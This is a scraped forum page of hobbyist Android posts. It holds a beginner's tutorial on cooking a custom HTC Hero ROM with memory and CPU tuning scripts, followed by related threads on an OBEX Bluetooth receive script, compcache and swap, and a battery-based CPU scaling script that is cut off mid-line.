Yes, rom cooking with any kitchen is easy enough for anyone to start with but I think it's better to have a clear tutorial for the newbie like me. As I've tried searching for sometimes, I came up with this post. It may not be a perfect guide but at least, it's better than start from nothing.
This guide is made in Thailand, that's why I add the Thai keyboard.
Sorry, if I made any mistakes, and please tell me to fix.
Thanks: pj from droidsans, eRobot from pdamobiz (these two guys are Thai dev who help me so much)
For dsixda, your kitchen is amazing, love it so much.
For what?
GoLauncherEX -> default(ADWLauncher)
There are many reasons why I would say GoLauncherEX is better than ADWLauncher; having task manager and uninstaller within itself prevent us from wating any more space on the applications. GoLauncherEX also provide a lot of FREE widgets, while some other launchers may ask you yo pay extra, and the best characteristic of all is "this-thing-flows-fluently" you may not believe how small of RAM it is consuming.
MIUI music player -> default(Music)
MIUI (Me-U-I) is one of the most popular chinese ROM as you can see from Andriod phone recently, what imprest me the most in MIUI is the music player, it allows you to shuffle the music my just shaking a phone (as you have seen in many apple products) and provide playlist function which I found very convienient.
Gallery2D -> default(Gallery3D)
To be honest with you, the Gallery3D is not going to be use in this article. Due to the beautiful effects from this program (which has not done any good but being beautiful) which consume a lot of resources and took you for-ever to load the pictures, this issue brings me down to Gallery2D, with the same abilities except for the affected effects.
DroidSansThaiKeyboard -> default
Another sweetener in the recipe from Thai Andriod developer. Custom rom usually does not provide Thai keyboard indeed, and since I am cooking my own rom right now, I decided to drop it in!
CPU 19,710 smartassV2 -> default(264, 518)
Kernel that I use is called "flykernel-13" many versions has been released and this guy has never disappoint me. We are going to overclock at the speed of 19-710 MHz., I use smartassV2 as a CPU governor. The reason why I choose smartassV2 instead of ondemand is because; smartassV2 is not running at the maximum speed or minimum speed all the time, it has the ideal frequencies that store two CPU value, it is set for 518 and 352 for scree on and off sequentially.
Minimum free memory optimization
Theoritically, Andriod is going to clear and retrieve the memory automatically, but this operation is too slow sometime. What we can do is, change the minimum and maximim limits of the CPU before Andriod will recall to use ram. Unfortunately, HTC hero has such a tiny memory capacity comparing to recent Andriod phones, therefore, the background application should be terminate inorder to save memory for the currently using application.
Let’s get is started, shall we?
Prepare ingredients
Base rom: Mine is Elelinux-7.1.0-RC1-Hero-v3.5-Light
Android SDK: Just in case we have to use the ADB
dsixda Android kitchen:
Other packages such as .apk application and kernel (in case you want to change it))
Set up the kitchen
First of all, you can download dsixda kitchen from here:
http://forum.xda-developers.com/showthread.php?t=633246v
Although the owner of dsixda has stopped developing this guy a while ago, dsixda is still very popular among the developers. So far I haven’t seen any kitchen work as easy as this one.
Steps of installation here, works well on windows, linux and mac:
http://forum.xda-developers.com/showpost.php?p=5626300&postcount=3
Find your base rom
Before cooking, we need to prepare the ingredients, and the most important thing in this process is base rom. I suggest that you should find some base rom to work with, but if not, this kitchen is able to work with official rom and nandriod backup. The instruction of importing rom into the kitchen should be at the bottom of the forum. (http://forum.xda-developers.com/showpost.php?p=5626300&postcount=3)
Extract the base rom
After you have import the base rom into the kitchen, unzip the file and follow these steps:
open the terminal, go to directory of kitchen image we have created previously by using command:
cd /Volumes/kitchen
then type:
./menu
to activate the kitchen, the sceen will be as shown below.
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
insert 1 and press Enter, kitchen will ask about setuo WORKING folder, follow the provided instructions and default. At the end, we are going to have a folder named WORKING_*****_***** which contain our rom inside, every configurations will be done in here.
Add more applications
We have two choices for adding applications in rom; one is to add it before the installation (which means it will become part of the system application, note that you won’t be able to uninstall the application unless you use titanium backup to take out the root access and uninstall from that), second is to install it as a user application (which is able to uninstall later on).
System applications
In WORKING_xxx, go to folder system > app you will see many .apk files, these are base applications in your phone; Settings.apk, Calendar.apk, etc.
Erase .apk files that you don’t want it to be in rom (caution: you many erase some important base applpications, so pick out the one you really know, and leave out all the rest.)
Copy .apk from other sources in here, if I was going to add GoLauncherEX, I’m going to browse for WORKING_xxx > system > app and erase a file name Launcher2.apk (this is the default launcher that comes with my base rom) then insert GoLaunherEX.apk into this folder (haven’t got the GoLauncherEX file? Google it!)
User applications
Open kitchen at the main menu.
type 0 to get to the Advanced options
type 13 to Enable /data/app
Follow the instructions of System applications except for the path, change it to:
WORKING_xxx > data > app
Minfree memory scripting
There are many applications in Andriod market that is able to work with this part, but since we are going to build your own rom, it make more sense to manage it before we flash the rom, it may be complicate, but I guarantee this is worth to do.
Kitchen has a function to do this for us, but it’s kind of mess up for me, somehow after you restart the phone, every setup is running back to default, so I decided to write them a script to make it actually work even after we restart the machine.
We are going to add the script in the system/etc/init.d/02memcputweak, if you couldn’t find a file name 02memcputeak, then create one of your own.
We are going to use the script from Juwe11 from XDA to be a default of minfree memory (http://forum.xda-developers.com/showthread.php?t=1111145) according to the link, you will see a script like this:
Code:
#!/system/bin/sh
# Copyright© 2011 Juwe11
# 13.8.2011 Updated VM values - Thanks to [Kalis] for help
# 18.8.2011 Added oom_adj values
# 19.9.2011 Updated VM and LMK values
if [ -e /sys/module/lowmemorykiller/parameters/adj ]; then
echo "0,1,2,4,6,15" > /sys/module/lowmemorykiller/parameters/adj
fi
if [ -e /sys/module/lowmemorykiller/parameters/minfree ]; then
echo "2560,4096,5632,10240,11776,14848" > /sys/module/lowmemorykiller/parameters/minfree
fi
if [ -e /proc/sys/vm/swappiness ]; then
echo "20" > /proc/sys/vm/swappiness
fi
if [ -e /proc/sys/vm/vfs_cache_pressure ]; then
echo "70" > /proc/sys/vm/vfs_cache_pressure
fi
if [ -e /proc/sys/vm/dirty_expire_centisecs ]; then
echo "3000" > /proc/sys/vm/dirty_expire_centisecs
fi
if [ -e /proc/sys/vm/dirty_writeback_centisecs ]; then
echo "500" > /proc/sys/vm/dirty_writeback_centisecs
fi
if [ -e /proc/sys/vm/dirty_ratio ]; then
echo "15" > /proc/sys/vm/dirty_ratio
fi
if [ -e /proc/sys/vm/dirty_background_ratio ]; then
echo "3" > /proc/sys/vm/dirty_background_ratio
fi
Let’s take a look at this part.
Code:
if [ -e /sys/module/lowmemorykiller/parameters/minfree ]; then
echo "2560,4096,5632,10240,11776,14848" > /sys/module/lowmemorykiller/parameters/minfree
fi
There are 6 sets of number, each one response to different part of work, which are
position 1 : 2560 -> foreground app ; applications that is now currently using.
position 2 : 4096 -> visible app ; applications that is not currently using, but haven’t finish the execution
position 3 : 5632 -> Secondary server ; service of the Operation Systems that applications needed to use.
position 4 : 10240 -> hidden app ; service that applications may needed to use, but not right now
position 5 : 11776 -> content provider ; connections between applications and the content
position 6 : 14848 -> empty app ; applications that are purposely left out in ram, in case you are going to use it again.
*FYI: number you above are the amount of page, if you want it in MB, multiply by 4 and divvided by 1024 (or X*4/1024) i.e. foreground app is 2560; 2560*4/1024 = 10 MB means that, if the free ram in total is less than 10MB, the foreground application will be terminated.
Next problem is, how are we going to manage
Code:
if [ -e /sys/module/lowmemorykiller/parameters/minfree ]; then
echo "1536,4096,4096,25000,25000,25000" > /sys/module/lowmemorykiller/parameters/minfree
fi
position 1 : 1536 -> foreground app ; applications which are being used right now, pour out some more ram please.
position 2 : 4096 -> visible app ; applications that haven’t stop working, so leave them alone.
position 3 : 4096 -> Secondary server ; service that still in use and should not be terminate. ชุดที่ 4 : 25000 -> hidden app ; service that applications may or may not use, we are not going to keep this one for too long.
position 5 : 25000 -> content provider ; we haven’t use much content from other applications.
position 6 : 25000 -> empty app ; applications that may be left out, just in case we are going to use it, which we occasionally do.
OC memory scripting
We are still going to mess with file 02memcputweak. After we have prepared the memory part, we are further going to manipulate the speed and the governor of CPU. The scripts within this part are easy scripts that will go to configuration file of the kernel during the OS boosting.
Code:
#!/system/bin/sh
#
echo 19200 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq
echo 710400 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
echo smartassV2 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
chmod 0755 /system/etc/init.d/*
Set the value of 19200 in /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq to be a minimum frequency, as well as the value of 710400 in /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq to be the maximum frequency.
After we adjust the speed of CPU, we are going to adjust the govenor as well. For the best performance, I pick smartassV2 and put it in:
/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
Then set the permission of files in init.d by using a command:
chmod 0755 /system/etc/init.d/*
Now we are eventually done with 02memcputweak.
Code:
#!/system/bin/sh
#
# Copyright© 2011 Juwe11
# 13.8.2011 Updated VM values - Thanks to [Kalis] for help
# 18.8.2011 Added oom_adj values
# 19.9.2011 Updated VM and LMK values
if [ -e /sys/module/lowmemorykiller/parameters/adj ]; then
echo "0,1,2,4,6,15" > /sys/module/lowmemorykiller/parameters/adj
fi
if [ -e /sys/module/lowmemorykiller/parameters/minfree ]; then
echo "1536,4096,4096,25000,25000,25000" > /sys/module/lowmemorykiller/parameters/minfree
fi
if [ -e /proc/sys/vm/swappiness ]; then
echo "20" > /proc/sys/vm/swappiness
fi
if [ -e /proc/sys/vm/vfs_cache_pressure ]; then
echo "70" > /proc/sys/vm/vfs_cache_pressure
fi
if [ -e /proc/sys/vm/dirty_expire_centisecs ]; then
echo "3000" > /proc/sys/vm/dirty_expire_centisecs
fi
if [ -e /proc/sys/vm/dirty_writeback_centisecs ]; then
echo "500" > /proc/sys/vm/dirty_writeback_centisecs
fi
if [ -e /proc/sys/vm/dirty_ratio ]; then
echo "15" > /proc/sys/vm/dirty_ratio
fi
if [ -e /proc/sys/vm/dirty_background_ratio ]; then
echo "3" > /proc/sys/vm/dirty_background_ratio
fi
echo 19200 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq
echo 710400 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
echo smartassV2 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
chmod 0755 /system/etc/init.d/*
Last steps, to make our script works in boot stage of Andriod, we have to insert
service script /system/etc/init.d/02memcputweak
oneshot
into file init.rc, which is located in WORKING_xxx > system > etc, the file will look similar to the text below::
Code:
# CyanogenMod Extras
# Compcache - handle at boot
service compcache /system/bin/handle_compcache
user root
group root
oneshot
service script /system/etc/init.d/02memcputweak
oneshot
Build rom from working directory
Back in the kitchen again, we are now going to pack rom back to .zip file so we could further test it.
In main menu of kitchen, there are options what to do with rom, type 99 to build the rom
After you have chosen a build option, change yourself to be an Interactive Mode (better for the new cooker).
Continue pressing Enter, throughout the process zipalign for optimize to reduce ram usage, and writting updater-script into rom (this part is the one who work with recovery and tell what to do in flashing.)
After every process is finished, we will get our rom in the folder OUTPUT_ZIP.
The next thing you have to do is flash and test the rom, enjoy.
can i use it to built a rom for lg p690
This is killer man. You're no noob.
Sent from my SGH-I727R using Tapatalk 2
sample rom
Can u give me the sample of rom?bcoz i dont want to use other base rom to cook
Related
Ok, I didn't like to open a new thread about OBEX and android, but, as I explain in this post http://forum.xda-developers.com/showpost.php?p=3932525&postcount=57 , I got OBEX working in my G1, and now I'm thinking about integrating a clean and elegant OBEX support into our ROMS.
Yes, there is already an application in the market for receiving and sending files via OBEX, but I simply don't like to pay for a feature that should be supported by default in every mobile phone.
I was wondering how would be the first approach for integrating the obexserver by default, and it would be really easy executing at boot time something like:
Code:
sdptool add --channel=4 OPUSH
test -d /sdcard/bluetooth_received || mkdir /sdcard/bluetooth_received
cd /sdcard/bluetooth_received && ( while true; do obexserver; done ) &
The only problem, is that disabling bluetooth and enabling it again, it loses the OPUSH service added by sdptool.
So, I'm now trying to find a way to tell the bluetooth daemons that they should add the OPUSH service when they are enabled, and here is where I need your help. Anybody knows how can this be done?
Also, another way would be simply executing a GScript when the OPUSH service is needed.
What do you think?
Thanks!
EDIT: Here is a simple script that enables the OBEX profile and receives 1 file. It is necessary to re-execute it to receive more files.
obex_get.sh:
Code:
#!/system/bin/sh
obex_status=`sdptool browse local 2>&1| egrep "^Service Name: OBEX Object Push|^Failed to connect"`
case "$obex_status" in
Failed*)
# bt disabled
echo "Please, enable bluetooth first!"
exit
;;
"")
# bt enabled, but no OPUSH profile
sdptool add --channel=4 OPUSH
;;
*)
# bt enabled, opush enabled
;;
esac
test -d /sdcard/bluetooth_downloads || mkdir /sdcard/bluetooth_downloads
cd /sdcard/bluetooth_downloads && obexserver
EDIT: Daemonized version of the script. It can be run as service at boot time, and every 3 seconds it will check if the opush profile has been lost.
Code:
#!/system/bin/sh
# create the download directory if it doesn't exist
test -d /sdcard/bluetooth_downloads || mkdir /sdcard/bluetooth_downloads
while sleep 3; do
# get bluetooth status
hcid_status_now="`getprop init.svc.hcid`"
# do nothing if bluetooth is stopped
test "$hcid_status_now" == "stopped" && continue
# if bluetooth is enabled, get opush profile status
obex_status=`sdptool browse local 2>&1| egrep "^Service Name: OBEX Object Push|^Failed to connect"`
case "$obex_status" in
"")
# bt enabled, but no OPUSH profile
sdptool add --channel=4 OPUSH; echo
;;
Failed*)
# bt disabled
#echo "Please, enable bluetooth first!"; echo
continue
;;
*)
# bt enabled, opush enabled
;;
esac
# if obexserver isn't already running, execute it.
pidof obexserver >/dev/null || ( cd /sdcard/bluetooth_downloads && obexserver ) &
done
EDIT: Ok, a definitely better version of the daemon:
Code:
#!/system/bin/sh
# create the download directory if it doesn't exist
test -d /sdcard/bluetooth_downloads || mkdir /sdcard/bluetooth_downloads
# in case /sdcard/bluetooth_downloads already exists, and is not a directory. Exit
test -d /sdcard/bluetooth_downloads || exit
# execute the obexserver loop (for it to be multifile)
( cd /sdcard/bluetooth_downloads && while true; do obexserver; done ) &
# execute the sdptool add OPUSH loop
while sleep 3; do
# get bluetooth status
hcid_status_now="`getprop init.svc.hcid`"
# do nothing if bluetooth is stopped
test "$hcid_status_now" == "stopped" && continue
# if bluetooth is enabled and no obex profile exists, add it
sdptool browse local 2>&1| egrep "^Service Name: OBEX Object Push" >/dev/null || sdptool add --channel=4 OPUSH
done
Still don't like to query the "sdptool browse local" every 3 seconds
Bugs and corrections are welcome.
juanmasg said:
Ok, I didn't like to open a new thread about OBEX and android, but, as I explain in this post http://forum.xda-developers.com/showpost.php?p=3932525&postcount=57 , I got OBEX working in my G1, and now I'm thinking about integrating a clean and elegant OBEX support into our ROMS.
Yes, there is already an application in the market for receiving and sending files via OBEX, but I simply don't like to pay for a feature that should be supported by default in every mobile phone.
I was wondering how would be the first approach for integrating the obexserver by default, and it would be really easy executing at boot time something like:
Code:
sdptool add --channel=4 OPUSH
test -d /sdcard/bluetooth_received || mkdir /sdcard/bluetooth_received
cd /sdcard/bluetooth_received && ( while true; do obexserver; done ) &
The only problem, is that disabling bluetooth and enabling it again, it loses the OPUSH service added by sdptool.
So, I'm now trying to find a way to say the bluetooth daemons that they should add the OPUSH service when they are enabled, and here is where I need your help. Anybody knows how can this be done?
Also, another way would be simply executing a GScript when the OPUSH service is needed.
What do you think?
Thanks!
Click to expand...
Click to collapse
I am not really sure how the bluetooth stack works, but does the OPUSH profile has its own process or it there someway to detect its presence?
If so we could easily implement some detecting mechanism in the loop body.
Another possibility is to check the error returned by obexserver if it implements any.
im gonna check out the source tree for you, cause i was just looking last night. i will post again as a read into the source a lot more
billc.cn said:
I am not really sure how the bluetooth stack works, but does the OPUSH profile has its own process or it there someway to detect its presence?
If so we could easily implement some detecting mechanism in the loop body.
Another possibility is to check the error returned by obexserver if it implements any.
Click to expand...
Click to collapse
The obex profile does not have it's own process, sdptool simply enables it in one of the bluez daemons (don't know which of them)
The "problem" here is that obexserver does not get any error when I disable bluetooth, it simply continues waiting for a connection. I'll try to look at the openobex API to see if we can get the bluetooth status or force some error. Sorry, my knowledgement about the bluetooth protocol is quite limited.
The curious thing about this, is that if I execute obexserver, disable bt, re-enable bt, and add the opush profile, without restarting the obexserver it still works.
juanmasg said:
The obex profile does not have it's own process, sdptool simply enables it in one of the bluez daemons (don't know which of them)
The "problem" here is that obexserver does not get any error when I disable bluetooth, it simply continues waiting for a connection. I'll try to look at the openobex API to see if we can get the bluetooth status or force some error. Sorry, my knowledgement about the bluetooth protocol is quite limited.
The curious thing about this, is that if I execute obexserver, disable bt, re-enable bt, and add the opush profile, without restarting the obexserver it still works.
Click to expand...
Click to collapse
so maybe this is running on a seperate process? no its entirely own, but maybe a child process? seems kinda weird to me... and its gonna be a while before i can start checking this out along with you, i need to re-download the android repo >.<
As long as you have that script that has to be run every time you want 1 file, would it be possible to do that every, say, 3 seconds in a loop? Maybe even have an obex app where you can press a button to have the script start running the loop and press again to kill the process. I'm thinking something similar to the wifi tether for root users in terms of interface.
EDIT: so something similar to this in terms of scriptage(can't remember the exact syntax for loops)
Code:
while 1
do
#!/system/bin/sh
obex_status=`sdptool browse local 2>&1| egrep "^Service Name: OBEX Object Push|^Failed to connect"`
case "$obex_status" in
Failed*)
# bt disabled
echo "Please, enable bluetooth first!"
exit
;;
"")
# bt enabled, but no OPUSH profile
sdptool add --channel=4 OPUSH
;;
*)
# bt enabled, opush enabled
;;
esac
test -d /sdcard/bluetooth_downloads || mkdir /sdcard/bluetooth_downloads
cd /sdcard/bluetooth_downloads && obexserver
sleep 3;
done;
corp769 said:
so maybe this is running on a seperate process? no its entirely own, but maybe a child process? seems kinda weird to me...
Click to expand...
Click to collapse
I think that we shouldn't monitor the obex profile status, but spawn the profile activation when bluetooth gets active. This will be more efficient.
We can monitor the bluetooth status with "getprop init.svc.hcid". This could be used in the script loop, but it would save a lot of work if we simply could (de)activate it when the bluetooth gets enabled or disabled.
I'm looking at /etc/bluez in the G1 and in my linux desktop to see if some file could do the magic.
i need to re-download the android repo
Click to expand...
Click to collapse
be patient my friend
Can't you just do this from init with the other daemons?
service hfag /system/bin/sdptool add --channel=10 HFAG
user bluetooth
group bluetooth net_bt_admin
disabled
oneshot
service hsag /system/bin/sdptool add --channel=11 HSAG
user bluetooth
group bluetooth net_bt_admin
disabled
oneshot
...etc
haha, i have no patience man, i'm in the military, and patience is not a virtue to me, i just want to get sh*t done
as far as what you are talking about, i understand what you mean. i'm also looking at the obex source in my linux distro (fedora 10) and kinda pondering if we could write a completely new routine (as a script for now of course) that would only be called when we need it, as in running it at boot and run in the background constantly. that hopefully wouldn't run up the processor tho...
and by the way, i would really like to help in everyway because i always wanted bluetooth file transfer on my G1
cyanogen said:
Can't you just do this from init with the other daemons?
service hfag /system/bin/sdptool add --channel=10 HFAG
user bluetooth
group bluetooth net_bt_admin
disabled
oneshot
service hsag /system/bin/sdptool add --channel=11 HSAG
user bluetooth
group bluetooth net_bt_admin
disabled
oneshot
...etc
Click to expand...
Click to collapse
Already tried that, but didn't work . Those "services" seem to be requested by the a2dp daemon when it starts, and the a2dp daemon starts and stops when bluetooth is enabled or disabled, so we still would need to get our daemon spawned with all the bluetooth stuff.
Thanks anyways.
BluetoothDeviceService.java does the work, would be trivial to patch this in..
Code:
private final Handler mHandler = new Handler() {
@Override
public void handleMessage(Message msg) {
switch (msg.what) {
case MESSAGE_REGISTER_SDP_RECORDS:
//TODO: Don't assume HSP/HFP is running, don't use sdptool,
if (isEnabled()) {
SystemService.start("hsag");
SystemService.start("hfag");
}
break;
case MESSAGE_FINISH_DISABLE:
finishDisable(msg.arg1 != 0);
break;
}
}
};
cyanogen said:
BluetoothDeviceService.java does the work, would be trivial to patch this in..
Code:
private final Handler mHandler = new Handler() {
@Override
public void handleMessage(Message msg) {
switch (msg.what) {
case MESSAGE_REGISTER_SDP_RECORDS:
//TODO: Don't assume HSP/HFP is running, don't use sdptool,
if (isEnabled()) {
SystemService.start("hsag");
SystemService.start("hfag");
}
break;
case MESSAGE_FINISH_DISABLE:
finishDisable(msg.arg1 != 0);
break;
}
}
};
Click to expand...
Click to collapse
Thanks cyanogen, that is what I was looking for.
I wanted to avoid to recompile the android core server, but It seems that we'll have to :-/.
cyanogen said:
BluetoothDeviceService.java does the work, would be trivial to patch this in..
Code:
private final Handler mHandler = new Handler() {
@Override
public void handleMessage(Message msg) {
switch (msg.what) {
case MESSAGE_REGISTER_SDP_RECORDS:
//TODO: Don't assume HSP/HFP is running, don't use sdptool,
if (isEnabled()) {
SystemService.start("hsag");
SystemService.start("hfag");
}
break;
case MESSAGE_FINISH_DISABLE:
finishDisable(msg.arg1 != 0);
break;
}
}
};
Click to expand...
Click to collapse
Exactly. Let's add the opush service here...
I'd love to patch it into my next ROM release
I added to the first post a modified version of the script that can be run as a "daemon".
Anyway, the way to implement this seems to be patching BluetoothDeviceService.java.
cyanogen said:
I'd love to patch it into my next ROM release
Click to expand...
Click to collapse
Can't wait for it
As for sending files, I was thinking about creating a mime handler that could be used with, p.e Filer (http://android.hlidskialf.com/software/filer) so that it could be able to send files via OBEX also.
Any idea?
cyanogen said:
BluetoothDeviceService.java does the work, would be trivial to patch this in..
Code:
private final Handler mHandler = new Handler() {
@Override
public void handleMessage(Message msg) {
switch (msg.what) {
case MESSAGE_REGISTER_SDP_RECORDS:
//TODO: Don't assume HSP/HFP is running, don't use sdptool,
if (isEnabled()) {
SystemService.start("hsag");
SystemService.start("hfag");
}
break;
case MESSAGE_FINISH_DISABLE:
finishDisable(msg.arg1 != 0);
break;
}
}
};
Click to expand...
Click to collapse
The more I think about it, the more I feel, that it should be done in ObexServer initialisation (ObexServer.java) ... which should be started from BluetoothDeviceService
here is my question... ok, we have the obex server for receiving files. now as far as sending files, how will that be set up? like will it be a seperate script to run the program, or will it be combined with the obex server?
an idea or two... juan, you mentioned about setting up a mime handler to send files. what it be possible to set up the handler for both receiving and sending files? it could most definitely be accomplished by creating a whole separate APK, and have that register the handles for the system, running as a service in the background. also we could use that for a graphical interface in the long run after we get the basics down pat, and have a file browser for sending files. i know this is jumping the gun, but it is all my ideas i have going on. on that note though, i think it would be the best way, unless you have a better idea
EDIT: now that i think of it, the APK would be best off other wise so we wouldnt have to have everyone who wants file transfer to reflash their whole phone just for a partially modified kernel
corp769 said:
EDIT: now that i think of it, the APK would be best off other wise so we wouldnt have to have everyone who wants file transfer to reflash their whole phone just for a partially modified kernel
Click to expand...
Click to collapse
I'd rather make part of the framework ready to be accepted by the AOSP than some kind of hack running only on rooted devices. Which brings another question: I was just starting to port the obexserver, when I realized that the OpenOBEX library is licensed under LGPL ... can we use it?
Hello Everyone,
First, I did search. That is how I figured out how to disable compcache and enable the swap. It's working great, however since I am no longer using compcache, I would like to make available the RAM that it is using. Here are my free commands:
BEFORE:
# free
free
total used free shared buffers
Mem: 97928 96356 1572 0 8164
Swap: 24476 15516 8960
Total: 122404 111872 10532
AFTER:
# free
free
total used free shared buffers
Mem: 97928 96416 1512 0 300
Swap: 31768 3092 28676
Total: 129696 99508 30188
Notice that the Physical Memory is still the same number, despite compcache being disabled (well, atleast swapoff'd) Here is my userinit and you can see that it's just enabling the swap.
#!/system/bin/sh
##adb push userinit.sh /system/sd/
uname_r=`uname -r`
moddir=`find /system/modules -type d -name $uname_r`
#insmod=/system/bin/insmod
#$insmod $moddir/compcache/xvmalloc.ko;
#$insmod $moddir/compcache/ramzswap.ko disksize_kb=32768;
#$insmod $moddir/compcache/ramzswap.ko backing_swap=/dev/block/mmcblk0p3;
#mknod /dev/ramzswap0 b 253 0;
echo 20 > /proc/sys/vm/swappiness;
# Experimental settings
#echo 1 > /proc/sys/vm/page-cluster; # default: 3 Changes Page clustering from 8 to 2.
#echo 5 > /proc/sys/vm/laptop_mode; # default: 0 Helps keep SSD from getting worn.
#echo 5000 > /proc/sys/vm/dirty_expire_centisecs; # default: 3000
#echo 800 > /proc/sys/vm/dirty_writeback_centisecs; # default: 500
#echo 10 > /proc/sys/vm/dirty_background_ratio; # default: 5
#echo 16 > /proc/sys/vm/dirty_ratio; # default: 10
#
#swapon /dev/ramzswap0;
swapon /dev/block/mmcblk0p3;
#Over Clock CPU when in use, puts at lower freq when idol. # if you don't want it.
#echo 128000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq;
#echo 528000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq;
QUESTION: Is there any way to re-allocate the compcache section of my physical RAM to be used again? There is that 24476b that I cannot use, as I'm using a swap.
Thanks for your time.
andjohn said:
Hello Everyone,
First, I did search. That is how I figured out how to disable compcache and enable the swap. It's working great, however since I am no longer using compcache, I would like to make available the RAM that it is using. Here are my free commands:
BEFORE:
# free
free
total used free shared buffers
Mem: 97928 96356 1572 0 8164
Swap: 24476 15516 8960
Total: 122404 111872 10532
AFTER:
# free
free
total used free shared buffers
Mem: 97928 96416 1512 0 300
Swap: 31768 3092 28676
Total: 129696 99508 30188
Notice that the Physical Memory is still the same number, despite compcache being disabled (well, atleast swapoff'd) Here is my userinit and you can see that it's just enabling the swap.
#!/system/bin/sh
##adb push userinit.sh /system/sd/
uname_r=`uname -r`
moddir=`find /system/modules -type d -name $uname_r`
#insmod=/system/bin/insmod
#$insmod $moddir/compcache/xvmalloc.ko;
#$insmod $moddir/compcache/ramzswap.ko disksize_kb=32768;
#$insmod $moddir/compcache/ramzswap.ko backing_swap=/dev/block/mmcblk0p3;
#mknod /dev/ramzswap0 b 253 0;
echo 20 > /proc/sys/vm/swappiness;
# Experimental settings
#echo 1 > /proc/sys/vm/page-cluster; # default: 3 Changes Page clustering from 8 to 2.
#echo 5 > /proc/sys/vm/laptop_mode; # default: 0 Helps keep SSD from getting worn.
#echo 5000 > /proc/sys/vm/dirty_expire_centisecs; # default: 3000
#echo 800 > /proc/sys/vm/dirty_writeback_centisecs; # default: 500
#echo 10 > /proc/sys/vm/dirty_background_ratio; # default: 5
#echo 16 > /proc/sys/vm/dirty_ratio; # default: 10
#
#swapon /dev/ramzswap0;
swapon /dev/block/mmcblk0p3;
#Over Clock CPU when in use, puts at lower freq when idol. # if you don't want it.
#echo 128000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq;
#echo 528000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq;
QUESTION: Is there any way to re-allocate the compcache section of my physical RAM to be used again? There is that 24476b that I cannot use, as I'm using a swap.
Thanks for your time.
Click to expand...
Click to collapse
hahaha, compcache doesn't take up your physical RAM.
ccyrowski said:
hahaha, compcache doesn't take up your physical RAM.
Click to expand...
Click to collapse
Ok, so where is it taking from? I understood that compcache is a Compression Swap that runs in RAM. Is that incorrect?
This does not belong in this area plz post questions like this in the Q&A area.
Prod1702 said:
This does not belong in this area plz post questions like this in the Q&A area.
Click to expand...
Click to collapse
Sorry, Mods please close. Reposting in QA
I modified the original rookeemod-oxygen script, so that you can supply limits in array form, eg:
LIMITS=( [10]=384000 [30]=691200 [50]=806400 [75]=998400)
It is attached to this post
First time i used bash, so if it isnt correct, please correct me.
I tested it and it works
Credits go to original creators, see copyright notice.
Code:
#!/system/bin/sh
#
# screenstate_scaling - switch CPU frequency governor on screen state change
# originally by [email protected] (FloHimself)
# mod teppic74 / xda - 12/10/2010
# Changelog:
# * Test for battery charging/full - if so, use alternative settings.
# * Allow for alternative frequencies when battery is below 30, 20 and 10%
# Modified by twicejr / xda - 15/01/2011 - made alternative frequencies work with an array, for more dynamic configurability.
# Modifications Copyright 2010
# Copying and distribution of this file, with or without modification,
# are permitted in any medium without royalty provided the copyright
# notice and this notice are preserved.
# ( note: options for freqs: 245000 384000 422400 460800 499200 537600 576000 614400 652800 691200 729600 768000 806400 844800 883200 921600 960000 998400 1036800 1075200 1113600 )
AWAKE_GOVERNOR="interactive"
AWAKE_GOVERNOR_FREQENCY_MAX="1113600"
AWAKE_GOVERNOR_FREQENCY_MIN="245000"
AWAKE_SAMPLING_RATE="40000"
AWAKE_CHARGING_GOVERNOR="interactive"
AWAKE_GOVERNOR_CHARGING_MAX="1113600"
AWAKE_GOVERNOR_CHARGING_MIN="499200"
SLEEP_GOVERNOR="interactive"
# irrelevant max for powersave
SLEEP_GOVERNOR_FREQENCY_MAX="245000"
SLEEP_GOVERNOR_FREQENCY_MIN="245000"
#LIMITS=( [10]=384000 [20]=460800 [30]=614400 [40]=729600 [50]=768000 [60]=806400 [70]=883200 [80]=998400 )
LIMITS=( [10]=384000 [30]=691200 [50]=806400 [75]=998400 )
SETCPU="com.mhuang.overclocking"
(while [ 1 ]
do
LIMIT_REACHED="0"
AWAKE=`cat /sys/power/wait_for_fb_wake`
BSTAT=`cat /sys/class/power_supply/battery/status`
if [ "$BSTAT" = "Charging" ] || [ "$BSTAT" = "Full" ] && [ ! "`pidof $SETCPU`" ]; then
echo $AWAKE_GOVERNOR_CHARGING_MIN > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq
echo $AWAKE_GOVERNOR_CHARGING_MAX > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
echo $AWAKE_CHARGING_GOVERNOR > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
log -p i -t screenstate_scaling "*** awake ***: $BSTAT - switching CPU frequency governor to -> $AWAKE_CHARGING_GOVERNOR"
elif [ $AWAKE = "awake" ] && [ ! "`pidof $SETCPU`" ]; then
echo $AWAKE_GOVERNOR_FREQENCY_MIN > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq
echo $AWAKE_GOVERNOR > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
BATT=`cat /sys/class/power_supply/battery/capacity`
for PERCENTAGE in ${!LIMITS[@]} ;
do
if [ $BATT -lt $PERCENTAGE ]; then
echo ${LIMITS[$PERCENTAGE]} > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
LIMIT_REACHED="1"
break
fi
done
if [ $LIMIT_REACHED = "0"]
